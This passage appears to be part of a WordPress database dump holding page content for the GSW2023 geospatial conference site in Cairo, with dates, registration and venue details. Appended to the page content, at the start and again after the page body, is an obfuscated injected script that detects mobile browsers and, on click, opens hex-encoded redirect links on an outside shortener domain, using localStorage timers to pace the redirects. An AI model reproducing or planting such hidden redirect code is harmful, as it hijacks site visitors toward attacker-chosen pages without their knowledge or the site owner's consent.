'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 01:34:30','2023-02-04 01:34:30','',3066,'https://gsw2023.com/?p=3732',0,'revision','',0),
(3733,1,'2023-02-04 01:46:40','2023-02-04 01:46:40','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 